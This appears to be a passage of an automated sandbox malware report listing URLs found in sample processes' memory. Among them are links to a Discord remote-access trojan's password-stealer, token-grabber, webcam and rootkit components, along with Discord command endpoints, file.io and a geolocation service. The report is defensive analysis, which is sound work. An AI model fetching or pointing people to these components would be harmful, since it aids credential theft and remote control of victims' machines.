Source: RuntimeBroker2.0.exe, 00000006.00000000.1716966909.000002227B642000.00000002.00000001.01000000.00000007.sdmp	String found in binary or memory: https://discord.com/api/v9/channels/
Source: 87Bym0x4Fy.exe, 00000000.00000002.1723649047.00000000039D1000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker2.0.exe, 00000006.00000000.1716966909.000002227B642000.00000002.00000001.01000000.00000007.sdmp	String found in binary or memory: https://discord.com/api/v9/guilds/
Source: 87Bym0x4Fy.exe, 00000000.00000002.1723649047.00000000039D1000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker2.0.exe, 00000006.00000000.1716966909.000002227B642000.00000002.00000001.01000000.00000007.sdmp	String found in binary or memory: https://file.io/
Source: RuntimeBroker2.0.exe, 00000006.00000002.1984341660.0000022200001000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://gateway.discord.gg
Source: RuntimeBroker2.0.exe, 00000006.00000002.1984341660.0000022200001000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://gateway.discord.gg/?v=9&encording=json
Source: RuntimeBroker2.0.exe, 00000006.00000002.1984341660.0000022200001000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://gateway.discord.gg/?v=9&encording=jsonX
Source: RuntimeBroker2.0.exe, 00000006.00000002.1984341660.0000022200001000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://gateway.discord.gg:443/?v=9&encording=json
Source: 87Bym0x4Fy.exe, 00000000.00000002.1723649047.00000000039D1000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker2.0.exe, 00000006.00000000.1716966909.000002227B642000.00000002.00000001.01000000.00000007.sdmp	String found in binary or memory: https://geolocation-db.com/json
Source: based.exe, 00000011.00000003.1818177199.000002A15D8E6000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1818342182.000002A15DB8A000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1817815301.000002A15DD1E000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1819459988.000002A15DB8D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Blank-c/BlankOBF
Source: powershell.exe, 00000003.00000002.1806725015.0000019AAB29B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: RuntimeBroker.exe, 00000007.00000002.1769014225.0000010D2D0CB000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1813171100.000002A15B8A6000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1811779581.000002A15B87E000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1811779581.000002A15B8C9000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1811751921.000002A15B8D6000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000012.00000003.1872130383.0000016BB1B20000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000012.00000003.1816415919.0000016BB1B1B000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000012.00000003.1816415919.0000016BB1ADB000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000012.00000003.1826593773.0000016BB1B1B000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000012.00000003.1812596305.0000016BB1B1B000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000012.00000003.1812596305.0000016BB1ADB000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000012.00000003.1816607556.0000016BB1B1B000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000012.00000003.1813296083.0000016BB1B1B000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000012.00000003.1816607556.0000016BB1ACD000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000012.00000003.1811643648.0000016BB1ADB000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000012.00000002.1931298572.0000016BB1B24000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000012.00000002.1928650960.0000016BB1AED000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000012.00000003.1812268854.0000016BB1B1B000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000012.00000003.1817284242.0000016BB1B16000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000012.00000003.1813296083.0000016BB1ADB000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000012.00000003.1822586123.0000016BB1B16000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Unidata/MetPy/blob/a3424de66a44bf3a92b0dcacf4dff82ad7b86712/src/metpy/plots/wx_sy
Source: RuntimeBroker.exe, 00000007.00000002.1769750613.0000010D2EE3C000.00000004.00001000.00020000.00000000.sdmp, based.exe, 00000011.00000003.1811751921.000002A15B8D6000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000012.00000003.1816415919.0000016BB1B1B000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000012.00000003.1812596305.0000016BB1B1B000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000012.00000003.1813296083.0000016BB1B1B000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000012.00000002.1933446910.0000016BB36FC000.00000004.00001000.00020000.00000000.sdmp, hacn.exe, 00000012.00000003.1812268854.0000016BB1B1B000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000012.00000003.1811643648.0000016BB1B1B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/python/cpython/blob/3.9/Lib/importlib/_bootstrap_external.py#L679-L688
Source: hacn.exe, 00000012.00000003.1816415919.0000016BB1B1B000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000012.00000003.1812596305.0000016BB1B1B000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000012.00000003.1813296083.0000016BB1B1B000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000012.00000003.1812268854.0000016BB1B1B000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000012.00000003.1811643648.0000016BB1B1B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4N
Source: hacn.exe, 00000012.00000003.1828089329.0000016BB1AE9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/abc.py
Source: RuntimeBroker.exe, 00000007.00000002.1769014225.0000010D2D0CB000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1813171100.000002A15B8A6000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1811779581.000002A15B87E000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1811779581.000002A15B8C9000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1811751921.000002A15B8D6000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000012.00000003.1872130383.0000016BB1B20000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000012.00000003.1816415919.0000016BB1B1B000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000012.00000003.1816415919.0000016BB1ADB000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000012.00000003.1826593773.0000016BB1B1B000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000012.00000003.1812596305.0000016BB1B1B000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000012.00000003.1812596305.0000016BB1ADB000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000012.00000003.1816607556.0000016BB1B1B000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000012.00000003.1813296083.0000016BB1B1B000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000012.00000003.1816607556.0000016BB1ACD000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000012.00000003.1811643648.0000016BB1ADB000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000012.00000002.1931298572.0000016BB1B24000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000012.00000002.1928650960.0000016BB1AED000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000012.00000003.1812268854.0000016BB1B1B000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000012.00000003.1817284242.0000016BB1B16000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000012.00000003.1813296083.0000016BB1ADB000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000012.00000003.1822586123.0000016BB1B16000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/reader
Source: RuntimeBroker.exe, 00000007.00000002.1769014225.0000010D2D0CB000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1813171100.000002A15B8A6000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1811779581.000002A15B87E000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1811779581.000002A15B8C9000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1811751921.000002A15B8D6000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000012.00000003.1872130383.0000016BB1B20000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000012.00000003.1816415919.0000016BB1B1B000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000012.00000003.1816415919.0000016BB1ADB000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000012.00000003.1826593773.0000016BB1B1B000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000012.00000003.1812596305.0000016BB1B1B000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000012.00000003.1812596305.0000016BB1ADB000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000012.00000003.1816607556.0000016BB1B1B000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000012.00000003.1813296083.0000016BB1B1B000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000012.00000003.1816607556.0000016BB1ACD000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000012.00000003.1811643648.0000016BB1ADB000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000012.00000002.1931298572.0000016BB1B24000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000012.00000002.1928650960.0000016BB1AED000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000012.00000003.1812268854.0000016BB1B1B000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000012.00000003.1817284242.0000016BB1B16000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000012.00000003.1813296083.0000016BB1ADB000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000012.00000003.1822586123.0000016BB1B16000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/tensorflow/datasets/blob/master/tensorflow_datasets/core/utils/resource_utils.py#
Source: based.exe, 00000011.00000003.1876089664.000002A15E023000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1977794400.000002A15DD06000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1910540479.000002A15DD06000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1910087038.000002A15E023000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/urllib3/urllib3/issues/2513#issuecomment-1152559900.
Source: based.exe, 00000011.00000003.1961012527.000002A15DC3C000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1910540479.000002A15DC3C000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1994709464.000002A15DC3C000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1864241622.000002A15DC3C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/urllib3/urllib3/issues/2920
Source: powershell.exe, 00000001.00000002.1795294245.000001F5BD423000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://go.micro
Source: based.exe, 00000011.00000003.1876089664.000002A15E035000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1910540479.000002A15DC24000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.2132863000.000002A15DFF9000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1981839613.000002A15E035000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1961012527.000002A15DC3C000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1910540479.000002A15DC3C000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1960792851.000002A15E035000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1899335631.000002A15DFF7000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1916793337.000002A15E035000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1910087038.000002A15E035000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.2001826540.000002A15DFFE000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.2027745994.000002A15E035000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.2132628407.000002A15E035000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1972917790.000002A15DFFE000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.2040687659.000002A15DFF9000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1961012527.000002A15DC24000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1994709464.000002A15DC24000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1911515850.000002A15DFFE000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1994709464.000002A15DC3C000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1864241622.000002A15DC24000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1910969788.000002A15DFFE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://google.com/
Source: based.exe, 00000011.00000003.1876089664.000002A15E035000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1910540479.000002A15DC24000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1981839613.000002A15E035000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1960792851.000002A15E035000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1916793337.000002A15E035000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1910087038.000002A15E035000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.2027745994.000002A15E035000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.2132628407.000002A15E035000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1961012527.000002A15DC24000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1994709464.000002A15DC24000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1864241622.000002A15DC24000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1911541145.000002A15E035000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://google.com/mail
Source: based.exe, 00000011.00000003.1969462146.000002A15DB94000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://google.com/mail/
Source: based.exe, 00000011.00000003.2040687659.000002A15E007000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1876089664.000002A15E000000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1991725190.000002A15E006000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1972370451.000002A15E007000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.2132863000.000002A15E002000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://html.spec.whatwg.org/multipage/
Source: based.exe, 00000011.00000003.1864241622.000002A15DC3C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://httpbin.org/
Source: based.exe, 00000011.00000003.1831935901.000002A15D886000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://json.org
Source: powershell.exe, 00000001.00000002.2426500786.000001F5CC9A3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2426500786.000001F5CC861000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1795294245.000001F5BE0CC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000001.00000002.1795294245.000001F5BDE82000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://oneget.org
Source: powershell.exe, 00000001.00000002.1795294245.000001F5BDE82000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://oneget.orgX
Source: hacn.exe, 00000012.00000002.1997269204.00007FFDEFB6F000.00000002.00000001.01000000.00000016.sdmp	String found in binary or memory: https://python.org/dev/peps/pep-0263/
Source: 87Bym0x4Fy.exe, 00000000.00000002.1723649047.00000000039D1000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker2.0.exe, 00000006.00000000.1716966909.000002227B642000.00000002.00000001.01000000.00000007.sdmp, RuntimeBroker2.0.exe, 00000006.00000002.1984341660.0000022200001000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://raw.githubusercontent.com/moom825/Discord-RAT-2.0/master/Discord%20rat/Resources/PasswordSte
Source: 87Bym0x4Fy.exe, 00000000.00000002.1723649047.00000000039D1000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker2.0.exe, 00000006.00000000.1716966909.000002227B642000.00000002.00000001.01000000.00000007.sdmp, RuntimeBroker2.0.exe, 00000006.00000002.1984341660.0000022200001000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://raw.githubusercontent.com/moom825/Discord-RAT-2.0/master/Discord%20rat/Resources/Token%20gra
Source: 87Bym0x4Fy.exe, 00000000.00000002.1723649047.00000000039D1000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker2.0.exe, 00000006.00000000.1716966909.000002227B642000.00000002.00000001.01000000.00000007.sdmp, RuntimeBroker2.0.exe, 00000006.00000002.1984341660.0000022200001000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://raw.githubusercontent.com/moom825/Discord-RAT-2.0/master/Discord%20rat/Resources/Webcam.dll
Source: 87Bym0x4Fy.exe, 00000000.00000002.1723649047.00000000039D1000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker2.0.exe, 00000006.00000000.1716966909.000002227B642000.00000002.00000001.01000000.00000007.sdmp, RuntimeBroker2.0.exe, 00000006.00000002.1984341660.0000022200001000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://raw.githubusercontent.com/moom825/Discord-RAT-2.0/master/Discord%20rat/Resources/rootkit.dll
Source: 87Bym0x4Fy.exe, 00000000.00000002.1723649047.00000000039D1000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker2.0.exe, 00000006.00000000.1716966909.000002227B642000.00000002.00000001.01000000.00000007.sdmp, RuntimeBroker2.0.exe, 00000006.00000002.1984341660.0000022200001000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://raw.githubusercontent.com/moom825/Discord-RAT-2.0/master/Discord%20rat/Resources/unrootkit.d
Source: based.exe, 00000010.00000003.1794117542.0000014703690000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sectigo.com/CPS0
Source: based.exe, 00000011.00000003.1929116625.000002A15E1A2000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1972370451.000002A15E007000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1964932180.000002A15E1A2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org
Source: based.exe, 00000011.00000003.1886313619.000002A15E06A000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1903947849.000002A15E1BF000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1928142320.000002A15E1B1000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1911047841.000002A15E13F000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1859807576.000002A15E1BE000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1964932180.000002A15E1B1000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1908023656.000002A15E13F000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1904680044.000002A15E07E000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1916793337.000002A15E080000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1911738602.000002A15E080000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: based.exe, 00000011.00000003.1903947849.000002A15E1BF000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1977794400.000002A15DD06000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1911047841.000002A15E13F000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1859807576.000002A15E1BE000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1910540479.000002A15DD06000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1908023656.000002A15E13F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/products/firefox
Source: based.exe, 00000011.00000003.1928142320.000002A15E1B1000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1964932180.000002A15E1B1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF
Source: based.exe, 00000011.00000003.2132863000.000002A15DFF9000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1961012527.000002A15DC3C000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1910540479.000002A15DC3C000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1899335631.000002A15DFF7000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.2001826540.000002A15DFFE000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1972917790.000002A15DFFE000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.2040687659.000002A15DFF9000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1911515850.000002A15DFFE000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1994709464.000002A15DC3C000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1910969788.000002A15DFFE000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1864241622.000002A15DC3C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://twitter.com/
Source: based.exe, 00000010.00000003.1792313595.000001470369D000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000010.00000003.1792313595.0000014703690000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.digicert.com/CPS0
Source: based.exe, 00000011.00000003.1929116625.000002A15E1A2000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.2004197771.000002A15E16C000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1972370451.000002A15E007000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.2130901869.000002A15E16D000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1964932180.000002A15E1A2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org
Source: based.exe, 00000011.00000003.1886313619.000002A15E06A000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1903947849.000002A15E1BF000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1911047841.000002A15E13F000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1859807576.000002A15E1BE000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1908023656.000002A15E13F000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1911738602.000002A15E07D000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1911541145.000002A15E06A000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1910087038.000002A15E06A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/
Source: based.exe, 00000011.00000003.1928142320.000002A15E1B1000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1964932180.000002A15E1B1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
Source: based.exe, 00000011.00000003.1886313619.000002A15E06A000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1903947849.000002A15E1BF000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1911047841.000002A15E13F000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1859807576.000002A15E1BE000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1908023656.000002A15E13F000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1904680044.000002A15E07E000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1916793337.000002A15E080000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1911738602.000002A15E080000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/
Source: based.exe, 00000011.00000003.1928142320.000002A15E1B1000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1964932180.000002A15E1B1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
Source: based.exe, 00000011.00000003.1911047841.000002A15E13F000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1908023656.000002A15E13F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
Source: based.exe, 00000011.00000003.1928142320.000002A15E1B1000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1964932180.000002A15E1B1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: based.exe, 00000011.00000003.1928142320.000002A15E1B1000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1911047841.000002A15E13F000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1859807576.000002A15E1BE000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1964932180.000002A15E1B1000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1908023656.000002A15E13F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: based.exe, 00000011.00000003.1916793337.000002A15E051000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1981839613.000002A15E051000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.2027745994.000002A15E051000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1886313619.000002A15E051000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.2132628407.000002A15E051000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1910087038.000002A15E051000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1911541145.000002A15E051000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1960792851.000002A15E051000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/media/img/favicons/mozilla/favicon-196x196.2af054fea211.png
Source: based.exe, 00000011.00000003.1911260411.000002A15E1BA000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1859807576.000002A15E1BA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/media/img/favicons/mozilla/favicon.d25d81d39065.icox
Source: based.exe, 00000011.00000003.1928142320.000002A15E1B1000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1964932180.000002A15E1B1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: based.exe, 00000010.00000003.1792455105.0000014703690000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.openssl.org/H
Source: RuntimeBroker.exe, 00000005.00000003.1724634863.0000024CBA22D000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 0000000F.00000003.1788254823.0000019333653000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000010.00000003.1790570421.0000014703690000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1816671465.000002A15D8CD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.python.org/dev/peps/pep-0205/
